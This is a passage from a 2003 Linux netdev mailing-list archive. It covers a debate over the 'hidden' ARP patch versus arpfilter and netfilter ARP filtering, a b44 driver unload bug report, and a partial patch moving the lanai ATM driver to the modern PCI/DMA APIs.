Ben -- Ben Greear Candela Technologies Inc http://www.candelatech.com From david.lang@digitalinsight.com Sun Jul 27 21:38:40 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 21:38:47 -0700 (PDT) Received: from warden3.diginsite.com (warden3-p.diginsite.com [208.147.64.186]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S4ccFl026275 for ; Sun, 27 Jul 2003 21:38:39 -0700 Received: from no.name.available by warden3.diginsite.com via smtpd (for oss.SGI.COM [192.48.159.27]) with SMTP; Sun, 27 Jul 2003 21:31:53 -0700 Received: from ata-navgw-how1.anytimeaccess.com ([10.210.80.95]) by ata-mail.anytimeaccess.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with SMTP id com for ; Sun, 27 Jul 2003 21:35:07 -0700 Received: from sacexc01.digitalinsight.com ([10.210.80.155]) by ata-navgw-how1.anytimeaccess.com (NAVIEG 2.1 bld 63) with SMTP id M2003072721300223786 ; Sun, 27 Jul 2003 21:30:02 -0700 Received: by sacexc01.anytimeaccess.com with Internet Mail Service (5.5.2656.59) id ; Sun, 27 Jul 2003 21:38:34 -0700 Received: from dlang.diginsite.com ([10.201.10.67]) by wlvexc00.digitalinsight.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2656.59) id PXM7W13K; Sun, 27 Jul 2003 21:38:28 -0700 From: David Lang To: "David S. 
Miller" Cc: Carlos Velasco , bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Date: Sun, 27 Jul 2003 21:37:10 -0700 (PDT) Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices In-Reply-To: <20030727175557.1d624b36.davem@redhat.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4330 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: david.lang@digitalinsight.com Precedence: bulk X-list: netdev Can a summary of this discussion get written and put into the documentation directory so that every time a new person stumbles on this feature we don't have to go through this discussion again? David Lang P.S. There are standards that are written documents and there are standards that are 'how everyone does it'. For the most part Linux follows both types of standards; in this case the network team has decided to ignore the 'how everyone else does it' standard because there is nothing in a written standard that they are violating. On Sun, 27 Jul 2003, David S. Miller wrote: > Date: Sun, 27 Jul 2003 17:55:57 -0700 > From: David S. Miller > To: Carlos Velasco > Cc: bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, > linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, > linux-kernel@vger.kernel.org > Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices > > On Mon, 28 Jul 2003 02:53:09 +0200 > "Carlos Velasco" wrote: > > > But if the hidden patch and /proc switch would be in the main kernel, > > it would be the simpliest way to solve all these "problems" (with an > > echo "1" and without filtering or using iproute2). > > With or without your suggestion, people have to do something > different. > > This doesn't even address all the problems there are with > the hidden patch.
It does things that belong on the netfilter > level and not on the ARP/routing level. > > Again, I'd like you to read all the discussions that have happened on > this topic in the past, in particular those made by Alexey Kuznetsov > on this topic. He gives very clear and concise reasons why the > "hidden" patch is logically doing things in the wrong part of the > kernel, and therefore won't ever be put into the tree. > - > To unsubscribe from this list: send the line "unsubscribe linux-kernel" in > the body of a message to majordomo@vger.kernel.org > More majordomo info at http://vger.kernel.org/majordomo-info.html > Please read the FAQ at http://www.tux.org/lkml/ > From davem@redhat.com Sun Jul 27 21:44:33 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 27 Jul 2003 21:44:37 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S4iLFl026768 for ; Sun, 27 Jul 2003 21:44:28 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id VAA27354; Sun, 27 Jul 2003 21:39:57 -0700 Date: Sun, 27 Jul 2003 21:39:56 -0700 From: "David S. 
Miller" To: David Lang Cc: carlosev@newipnet.com, bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Message-Id: <20030727213956.6ede8008.davem@redhat.com> In-Reply-To: References: <20030727175557.1d624b36.davem@redhat.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4331 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Sun, 27 Jul 2003 21:37:10 -0700 (PDT) David Lang wrote: > P.S. there are standards that are written documents and there are > standards that are 'how everyone does it' for the most part Linux follows > both types of standards, in this case the network team has decided to > ignore the 'how everyone else does it' standards becouse there is nothing > in a written standard that they are violating Keep in mind that we implemented sys_sendfile() with different arguments and semantics than everyone else. From bloemsaa@xs4all.nl Mon Jul 28 00:33:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 00:34:03 -0700 (PDT) Received: from smtpzilla1.xs4all.nl (smtpzilla1.xs4all.nl [194.109.127.137]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S7XqFl005017 for ; Mon, 28 Jul 2003 00:33:53 -0700 Received: from llewella (vialle.xs4all.nl [213.84.6.25]) by smtpzilla1.xs4all.nl (8.12.9/8.12.9) with SMTP id h6S7Xg6a007185; Mon, 28 Jul 2003 09:33:47 +0200 (CEST) Message-ID: <01a601c354da$9710cc10$cd01a8c0@llewella> From: "Bas Bloemsaat" To: "Ben Greear" , "David S. 
Miller" , "Carlos Velasco" , , References: <20030727151234.6e2aa57e.davem@redhat.com> <3F248AE5.4000204@candelatech.com> Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Date: Mon, 28 Jul 2003 09:33:46 +0200 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1158 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 X-archive-position: 4332 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: bloemsaa@xs4all.nl Precedence: bulk X-list: netdev Hi all, > > Not a bug. This behavior is on purpose. First of all I'm sorry I rubbed some old sores. I didn't know the behaviour was on purpose, and I did google for it. Could have saved my weekend, had I known. > >Bas's problem can be solved by him giving a "preferred source" > >to each of his IPV4 routes and setting the "arpfilter" sysctl > >variable for his devices to "1". > > Yes, it's another approach to solve his problem. But he must play with routing. Routing isn't solving anything here, it's too dynamic. Only one of the devices has a fixed IP, and handles a link to the outside, among others. The other is on DHCP: addresses can change without warning. Both are on the same ethernet segment. I've looked at the hidden patch, and it's capable of doing this right. I do think this has to be solved at the device layer. It's quite counter intuitive the way it is now. My vote goes to hidden. 
Regards, Bas From cedric.gavage@unixtech.be Mon Jul 28 00:40:46 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 00:40:53 -0700 (PDT) Received: from virtual.paginaweb.be (virtual.paginaweb.be [212.3.242.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S7eiFl005885 for ; Mon, 28 Jul 2003 00:40:45 -0700 Received: from unixtech.be (warp-core.skynet.be [195.238.24.200]) (authenticated bits=0) by virtual.paginaweb.be (8.12.9/8.12.9/UnixTech - Niddle v2.5 - abuse@unixtech.be) with ESMTP id h6S7eaZk030813; Mon, 28 Jul 2003 09:40:37 +0200 Message-ID: <3F24D31F.5050904@unixtech.be> Date: Mon, 28 Jul 2003 09:39:11 +0200 From: Cedric Gavage User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030714 Debian/1.3.1-3 StumbleUpon/1.73 X-Accept-Language: en MIME-Version: 1.0 To: "David S. Miller" CC: alan@lxorguk.ukuu.org.uk, netdev@oss.sgi.com Subject: Re: [Fwd: kernel 2.4.21] References: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> <20030719191723.0821227f.davem@redhat.com> <3F1E53F7.5000803@unixtech.be> <20030723023528.76b0f69c.davem@redhat.com> <3F1E58EE.5010109@unixtech.be> <20030723024648.2e4b6a62.davem@redhat.com> <3F1E7435.4060308@unixtech.be> <20030727163422.28e44736.davem@redhat.com> In-Reply-To: <20030727163422.28e44736.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4333 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: cedric.gavage@unixtech.be Precedence: bulk X-list: netdev David S. Miller wrote: > On Wed, 23 Jul 2003 13:40:37 +0200 > Cedric Gavage wrote: > > >>Ok, now it's e100 driver, I will wait some hours to see if we have again >>problems, thanks for your help. > > > Any problems yet? > It's ok now... I was waiting some hours (days) to see if it was really ok ;) Thanks for your help. 
-- Cedric Gavage http://unixtech.be - http://gavage.com - OpenPGP: 0xED325C64 From zagarna@yahoo.com Mon Jul 28 02:42:34 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 02:42:42 -0700 (PDT) Received: from smtp014.mail.yahoo.com (smtp014.mail.yahoo.com [216.136.173.58]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S9gYFl019459 for ; Mon, 28 Jul 2003 02:42:34 -0700 Received: from nat.infrapix.infracom.it (HELO sinbad) (zagarna@193.108.239.34 with login) by smtp.mail.vip.sc5.yahoo.com with SMTP; 28 Jul 2003 09:42:33 -0000 Date: Mon, 28 Jul 2003 11:43:02 +0200 From: Antonio Dolcetta To: pp@ee.oulu.fi Cc: netdev@oss.sgi.com Subject: b44 module problems Message-Id: <20030728114302.1cbb6f70.zagarna@yahoo.com> X-Mailer: Sylpheed version 0.9.3claws (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4334 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: zagarna@yahoo.com Precedence: bulk X-list: netdev Hi, I'm having problems with the new b44 module on linux-2.6-test1, patched with the same patch that eventually got into test-2. This is how I can reproduce the problem: 1) boot and load the module, don't plug in the ethernet cable 2) try to configure the card via DHCP; it times out 3) rmmod b44 At this point I get CPU at 90%, new instances of lsmod and rmmod hang during execution, and I get the following kernel message every few seconds: unregister_netdevice: waiting for eth0 to become free. Usage count = 1 Is there any more testing I can do for you? The module works flawlessly otherwise. Thank you, Antonio Dolcetta -- Speaking just for me, I don't think I have Linux blinders on my eyes. I can see other platforms, but I *choose* to ignore them on the theory that if I ignore them hard enough they will go away. This theory is obviously crazy. However, it also appears to be working. -- Eric S.
Raymond From pp@ee.oulu.fi Mon Jul 28 02:56:36 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 02:56:42 -0700 (PDT) Received: from ee.oulu.fi (ee.oulu.fi [130.231.61.23]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6S9uZFl020848 for ; Mon, 28 Jul 2003 02:56:36 -0700 Received: from tk1.oulu.fi (tk1 [130.231.48.41]) by ee.oulu.fi (8.12.9/8.12.9) with ESMTP id h6S9uV3G000684; Mon, 28 Jul 2003 12:56:31 +0300 (EEST) Received: (from pp@localhost) by tk1.oulu.fi (8.12.9/8.12.9/Submit) id h6S9uVjx007087; Mon, 28 Jul 2003 12:56:31 +0300 (EEST) Date: Mon, 28 Jul 2003 12:56:31 +0300 From: Pekka Pietikainen To: Antonio Dolcetta Cc: netdev@oss.sgi.com Subject: Re: b44 module problems Message-ID: <20030728095631.GA6946@ee.oulu.fi> References: <20030728114302.1cbb6f70.zagarna@yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-15 Content-Disposition: inline In-Reply-To: <20030728114302.1cbb6f70.zagarna@yahoo.com> User-Agent: Mutt/1.4.1i X-archive-position: 4335 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pp@ee.oulu.fi Precedence: bulk X-list: netdev On Mon, Jul 28, 2003 at 11:43:02AM +0200, Antonio Dolcetta wrote: > 1 ) boot and load the module, don't plug in the ethernet cable > 2 ) try to configure the card via dhcp, it times out > 3 ) rmmod b44 > at this point I get cpu at 90% > new istances of lsmod and rmmod hang during execution > i get the following kernel events: > unregister_netdevice: waiting for eth0 to become free. Usage count = 1 > every few seconds, > is there any more testing i can do for you? > > the module works flawlessly otherwise > thank you Hi You're not trying to use ipv6 or have the module loaded by any chance? When working on the driver I had similar problems with rmmod on 2.5 when the ipv6 module was loaded, without it unloading worked just fine (if I understood correctly, this is a known problem with all ethernet drivers). 
In any case I'll try reproducing the problem when I get back home. From carlosev@newipnet.com Mon Jul 28 03:44:18 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 03:44:24 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SAiAFl027705 for ; Mon, 28 Jul 2003 03:44:11 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id ED399207AB; Mon, 28 Jul 2003 12:44:07 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 61F3D20619; Mon, 28 Jul 2003 12:43:50 +0200 (CEST) Message-ID: <200307281243530385.12D80171@192.168.128.16> In-Reply-To: <20030727183547.784b6ab5.davem@redhat.com> References: <200307280140470646.1078EC67@192.168.128.16> <20030727164649.517b2b88.davem@redhat.com> <200307280158250677.10891156@192.168.128.16> <20030727165831.05904792.davem@redhat.com> <200307280211590888.10957DD9@192.168.128.16> <20030727171403.6e5bcc58.davem@redhat.com> <200307280235210263.10AADFF8@192.168.128.16> <20030727173600.475d95fb.davem@redhat.com> <200307280253090799.10BB2DF0@192.168.128.16> <20030727175557.1d624b36.davem@redhat.com> <200307280323020667.10D68954@192.168.128.16> <20030727183547.784b6ab5.davem@redhat.com> X-Mailer: Calypso Version 3.30.00.00 (4) Date: Mon, 28 Jul 2003 12:43:53 +0200 From: "Carlos Velasco" To: "David S. Miller" Cc: bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Content-Type: text/plain; charset="us-ascii" X-archive-position: 4336 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev On 27/07/2003 at 18:35 David S. 
Miller wrote:

>I don't deny that it fixes your problem, that is not what
>we're talking about. We're talking about how one should
>fix the problem, and I'm trying to show you why "hidden"
>patch is not the answer to that.

Yes, and I'm trying to tell you that it's not the only way to solve it, but it is the simplest way to do it. I'm sure most Linux users who have stepped into this "behaviour" think the same.

>Ummm, with "hidden" you still have to make a configuration change.

Just enabling it via the /proc switch. It could be done "by default", but as we discussed on the netdev list, changing the default behaviour of Linux when it has been working this way for years is not a good thing.

>Second of all, "hidden" makes the kernel behave in a non-RFC compliant
>way. This is the categorization that I use to determine if something
>belongs on the netfilter level or not.

Non-RFC compliant? Which RFC is it breaking? I don't think the hidden patch breaks any RFC. I also don't think the current behaviour breaks any RFC, but if either of them did, it would be the current one. The current behaviour of Linux makes loopback interfaces pointless. Also, as far as I know, 127.0.0.1 is not answered in ARP, although it's the default address of the lo interface. So... there's some filter in the kernel too.

>If something changes the way in which the Linux networking
>behaves wrt. RFCs, this "operation" belongs at the netfilter level.

I think you are wrong; RFCs do not say anything about interfaces. It's the decision of the OS how this is implemented.

>This is true for the "hidden" patch. It causes the system to
>ignore ARP requests it should respond to.

Not at all; it ignores ARP requests that arrive on one interface with the IP address of ANOTHER interface as destination. If there's something wrong, I think this is the wrong behaviour.
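To make the two ARP reply policies argued over in this thread concrete, here is a minimal user-space sketch in C. It is only a model of the behaviour as the posters describe it, not kernel code: the struct and function names (`model_iface`, `arp_reply_any_local`, `arp_reply_same_iface`) are hypothetical and exist neither in the kernel nor in the "hidden" patch.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical model of a host interface: a name plus its IPv4 addresses. */
struct model_iface {
    const char *name;
    uint32_t addrs[4];   /* addresses configured on this interface */
    size_t naddrs;       /* number of valid entries in addrs[] */
};

/* True if ip is configured on this particular interface. */
bool iface_has_addr(const struct model_iface *ifc, uint32_t ip)
{
    for (size_t i = 0; i < ifc->naddrs; i++)
        if (ifc->addrs[i] == ip)
            return true;
    return false;
}

/*
 * Policy described in the thread as the Linux default: answer an ARP
 * request if the target IP is configured on ANY interface of the host,
 * regardless of which interface the request arrived on.
 */
bool arp_reply_any_local(const struct model_iface *ifaces, size_t n,
                         uint32_t target_ip)
{
    for (size_t i = 0; i < n; i++)
        if (iface_has_addr(&ifaces[i], target_ip))
            return true;
    return false;
}

/*
 * Per-interface policy, as Carlos describes the effect he wants: answer
 * only if the target IP is configured on the interface with index rx,
 * the one the request arrived on.
 */
bool arp_reply_same_iface(const struct model_iface *ifaces, size_t n,
                          size_t rx, uint32_t target_ip)
{
    return rx < n && iface_has_addr(&ifaces[rx], target_ip);
}
```

With an address configured only on lo, a request for it arriving on eth0 is answered under the first policy and ignored under the second, which is the difference being debated.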
If we go back to my "problem" setting, Linux sends an ARP request with the address of the loopback interface as the source IP address, which makes no sense on the ethernet interface, causing the Cisco to not reply to this packet (although I think the Cisco is failing the RFC).

>On the other hand, the "arpfilter" sysctl setting makes the kernel
>still behave in an RFC compliant manner, it only responds to ARPs
>on interfaces it would use to speak to the requestor.

I think the hidden patch is also RFC compliant. Moreover, the "hidden" patch makes Linux behave like the other OSes and systems I have tested. So... are you saying all these systems are NOT RFC compliant?

>> Really, the only one I have tested that not do it is Linux 2.2+
>
>Yes, we removed "hidden" from 2.2.x in lieu of "arpfilter" sysctl
>and the netfilter ARP filtering module.

With the hidden patch being the simplest approach to solving these "problems".

>> For me (not a kernel developer), my world are the OSI layers,
>
>OSI layers have nothing to do with the problem we are discussing.
>
>BTW, OSI layers are how networking stacks are described in textbooks
>and standards and far away from how one should implement said stack.
>Van Jacobson even said this once :-)

As far as I know, the hidden patch isolates interfaces at layer 2 (ARP). For isolation of interfaces at layer 3, the forwarding switch in /proc should be used. As for the kernel not being the right place to do these things, there are already switches:

proxy_arp
rp_filter
accept_redirects
forwarding
send_redirects

These example switches modify the behaviour of the Linux box in the kernel, without using netfilter.

>> I will look... but doing arp filter is not a real simple solution in
>> any way.
>
>It would be really nice if people might consider that it could even be
>possible to make things like the IPVS layer install the appropriate
>NETFILTER_ARP chain rules when the IPVS configuration installed dictates
>that one is needed.
>
>People using IPVS wouldn't even need to do _ANYTHING_ if IPVS were
>to do that.
>
>And all of that would be _FINE_ because like ARP netfilter, IPVS lies
>inside of netfilter where such things which change networking behavior
>semantics radically belong.

I'm not sure, but is IPVS the Linux Virtual Server? Well... my "problem" setting was not with LVS; I use a Cisco hardware load balancing device. Also, the problem in this setting is not in the load balancing device, it's on the "real servers", which do not use the LVS software at all. These servers simply don't know they are being "balanced".

But again, David, LVS is not the only setting that reveals this "problem" with interface isolation. Bas has stepped into the same "problem" in another setting.

Also, this "problem" with Linux opens a minor security hole (see Bas's mail), unless you use the ARP filter or the hidden patch.

Regards,
Carlos Velasco

From carlosev@newipnet.com Mon Jul 28 03:50:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 03:50:10 -0700 (PDT) Received: from smtp.newipnet.com (5.Red-80-32-157.pooles.rima-tde.net [80.32.157.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SAo4Fl028434 for ; Mon, 28 Jul 2003 03:50:05 -0700 Received: by smtp.newipnet.com (ESMTP Server, from userid 511) id 46DAC20619; Mon, 28 Jul 2003 12:50:01 +0200 (CEST) Received: from madre (madre.newipnet.com [192.168.128.4]) by smtp.newipnet.com (ESMTP Server) with ESMTP id 301E2207AB; Mon, 28 Jul 2003 12:49:50 +0200 (CEST) Message-ID: <200307281249530272.12DD7F41@192.168.128.16> In-Reply-To: References: X-Mailer: Calypso Version 3.30.00.00 (4) Date: Mon, 28 Jul 2003 12:49:53 +0200 From: "Carlos Velasco" To: "David Lang" , "David S.
Miller" Cc: bloemsaa@xs4all.nl, marcelo@conectiva.com.br, netdev@oss.sgi.com, linux-net@vger.kernel.org, layes@loran.com, torvalds@osdl.org, linux-kernel@vger.kernel.org Subject: Re: [2.4 PATCH] bugfix: ARP respond on all devices Content-Type: text/plain; charset="us-ascii" X-archive-position: 4337 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: carlosev@newipnet.com Precedence: bulk X-list: netdev

On 27/07/2003 at 21:37 David Lang wrote:

>P.S. there are standards that are written documents and there are
>standards that are 'how everyone does it' for the most part Linux follows
>both types of standards, in this case the network team has decided to
>ignore the 'how everyone else does it' standards because there is nothing
>in a written standard that they are violating

No problem with behaving differently. The questions are... What is the advantage of doing so in this case? Why not implement an easy way to make Linux behave like the other OSes and systems?

Regards,
Carlos Velasco

From chas@locutus.cmf.nrl.navy.mil Mon Jul 28 06:53:28 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 28 Jul 2003 06:53:40 -0700 (PDT) Received: from ginger.cmf.nrl.navy.mil (ginger.cmf.nrl.navy.mil [134.207.10.161]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6SDrQFl017339 for ; Mon, 28 Jul 2003 06:53:27 -0700 Received: from locutus.cmf.nrl.navy.mil (locutus.cmf.nrl.navy.mil [134.207.10.66]) by ginger.cmf.nrl.navy.mil (8.12.7/8.12.7) with ESMTP id h6SDrHsG009681; Mon, 28 Jul 2003 09:53:17 -0400 (EDT) Message-Id: <200307281353.h6SDrHsG009681@ginger.cmf.nrl.navy.mil> To: Mitchell Blank Jr cc: davem@redhat.com, netdev@oss.sgi.com Reply-To: chas3@users.sourceforge.net Subject: Re: [atmdrvr lanai] PATCH: update to modern DMA/PCI api, etc In-reply-to: Your message of "Sun, 27 Jul 2003 21:56:20 PDT."
<20030728045620.GJ32831@gaz.sfgoth.com> Date: Mon, 28 Jul 2003 09:50:35 -0400 From: chas williams X-Spam-Score: () hits=-2.9 X-Virus-Scanned: NAI Completed X-Scanned-By: MIMEDefang 2.30 (www . roaringpenguin . com / mimedefang) X-archive-position: 4338 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: chas@cmf.nrl.navy.mil Precedence: bulk X-list: netdev dave, please apply the following patch from mitch: In message <20030728045620.GJ32831@gaz.sfgoth.com>,Mitchell Blank Jr writes: >This patch updates my lanai driver to use the modern PCI and DMA APIs (along >with a few other trivial things). With this patch the driver should work >on non-i386 platforms - I personally have it working on my sparc64 box now. >Hopefully that means I'll be able to do some ATM work now. > >The patch doesn't remove the MOD_{INC,DEC}_USE_COUNT stuff pending the >mass-conversion of ATM drivers. > >This is versus 2.6.0-test1 but nothing changed in this file for -test2 so it >will apply cleanly. Chas - if this looks ok to you please push it upstream. # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. 
# This patch includes the following deltas: # ChangeSet 1.1473.1.2 -> 1.1473.1.3 # drivers/atm/lanai.c 1.10 -> 1.11 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/07/28 chas@relax.cmf.nrl.navy.mil 1.1473.1.3 # update lanai driver to use the modern PCI and DMA APIs (from mitch@sfgoth.com) # -------------------------------------------- # diff -Nru a/drivers/atm/lanai.c b/drivers/atm/lanai.c --- a/drivers/atm/lanai.c Mon Jul 28 09:51:13 2003 +++ b/drivers/atm/lanai.c Mon Jul 28 09:51:13 2003 @@ -1,4 +1,4 @@ -/* lanai.c -- Copyright 1999 by Mitchell Blank Jr +/* lanai.c -- Copyright 1999-2003 by Mitchell Blank Jr * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License @@ -55,6 +55,7 @@ */ /* Version history: + * v.1.00 -- 26-JUL-2003 -- PCI/DMA updates * v.0.02 -- 11-JAN-2000 -- Endian fixes * v.0.01 -- 30-NOV-1999 -- Initial release */ @@ -178,7 +179,7 @@ printk(KERN_DEBUG DEV_LABEL ": " format, ##args) #define APRINTK(truth, format, args...) \ do { \ - if (!(truth)) \ + if (unlikely(!(truth))) \ printk(KERN_ERR DEV_LABEL ": " format, ##args); \ } while (0) @@ -215,7 +216,7 @@ u32 *start; /* From get_free_pages */ u32 *end; /* One past last byte */ u32 *ptr; /* Pointer to current host location */ - int order; /* log2(size/PAGE_SIZE) */ + dma_addr_t dmaaddr; }; struct lanai_vcc_stats { @@ -373,89 +374,76 @@ /* * Lanai needs DMA buffers aligned to 256 bytes of at least 1024 bytes - - * we assume that any page allocation will do. I'm sure this is - * never going to be a problem, but it's good to document assumtions + * usually any page allocation will do. Just to be safe in case + * PAGE_SIZE is insanely tiny, though... 
*/ -#if PAGE_SIZE < 1024 -#error PAGE_SIZE too small to support LANAI chipset -#endif -/* - * We also assume that the maximum buffer size will be some number - * of whole pages, although that wouldn't be too hard to fix - */ -#if PAGE_SIZE > (128 * 1024) -#error PAGE_SIZE too large to support LANAI chipset -#endif - -/* Convert a size to "order" for __get_free_pages */ -static int bytes_to_order(int bytes) -{ - int order = 0; - if (bytes > (128 * 1024)) - bytes = 128 * 1024; /* Max buffer size for lanai */ - while ((PAGE_SIZE << order) < bytes) - order++; - return order; -} +#define LANAI_PAGE_SIZE ((PAGE_SIZE >= 1024) ? PAGE_SIZE : 1024) /* * Allocate a buffer in host RAM for service list, RX, or TX - * Returns buf->order<0 if no memory - * Note that the size will be rounded up to an "order" of pages, and + * Returns buf->start==NULL if no memory + * Note that the size will be rounded up 2^n bytes, and * if we can't allocate that we'll settle for something smaller * until minbytes - * - * NOTE: buffer must be 32-bit DMA capable - when linux can - * make distinction, this will need tweaking for this - * to work on BIG memory machines. */ static void lanai_buf_allocate(struct lanai_buffer *buf, - int bytes, int minbytes) + size_t bytes, size_t minbytes, struct pci_dev *pci) { - unsigned long address; - int order = bytes_to_order(bytes); + int size; + + if (bytes > (128 * 1024)) /* max lanai buffer size */ + bytes = 128 * 1024; + for (size = LANAI_PAGE_SIZE; size < bytes; size *= 2) + ; + if (minbytes < LANAI_PAGE_SIZE) + minbytes = LANAI_PAGE_SIZE; do { - address = __get_free_pages(GFP_KERNEL, order); - if (address != 0) { /* Success */ - bytes = PAGE_SIZE << order; - buf->start = buf->ptr = (u32 *) address; - buf->end = (u32 *) (address + bytes); - memset((void *) address, 0, bytes); + /* + * Technically we could use non-consistent mappings for + * everything, but the way the lanai uses DMA memory would + * make that a terrific pain. This is much simpler. 
+ */ + buf->start = pci_alloc_consistent(pci, size, &buf->dmaaddr); + if (buf->start != NULL) { /* Success */ + /* Lanai requires 256-byte alignment of DMA bufs */ + APRINTK((buf->dmaaddr & ~0xFFFFFF00) == 0, + "bad dmaaddr: 0x%lx\n", + (unsigned long) buf->dmaaddr); + buf->ptr = buf->start; + buf->end = (u32 *) + (&((unsigned char *) buf->start)[size]); + memset(buf->start, 0, size); break; } - if ((PAGE_SIZE << --order) < minbytes) - order = -1; /* Too small - give up */ - } while (order >= 0); - buf->order = order; -} - -static inline void lanai_buf_deallocate(struct lanai_buffer *buf) -{ - if (buf->order >= 0) { - APRINTK(buf->start != 0, "lanai_buf_deallocate: start==0!\n"); - free_pages((unsigned long) buf->start, buf->order); - buf->start = buf->end = buf->ptr = 0; - } + size /= 2; + } while (size >= minbytes); } /* size of buffer in bytes */ -static inline int lanai_buf_size(const struct lanai_buffer *buf) +static inline size_t lanai_buf_size(const struct lanai_buffer *buf) { return ((unsigned long) buf->end) - ((unsigned long) buf->start); } -/* size of buffer as "card order" (0=1k .. 7=128k) */ -static inline int lanai_buf_size_cardorder(const struct lanai_buffer *buf) +static void lanai_buf_deallocate(struct lanai_buffer *buf, + struct pci_dev *pci) { - return buf->order + PAGE_SHIFT - 10; + if (buf->start != NULL) { + pci_free_consistent(pci, lanai_buf_size(buf), + buf->start, buf->dmaaddr); + buf->start = buf->end = buf->ptr = NULL; + } } -/* DMA-able address for this buffer */ -static unsigned long lanai_buf_dmaaddr(const struct lanai_buffer *buf) +/* size of buffer as "card order" (0=1k .. 
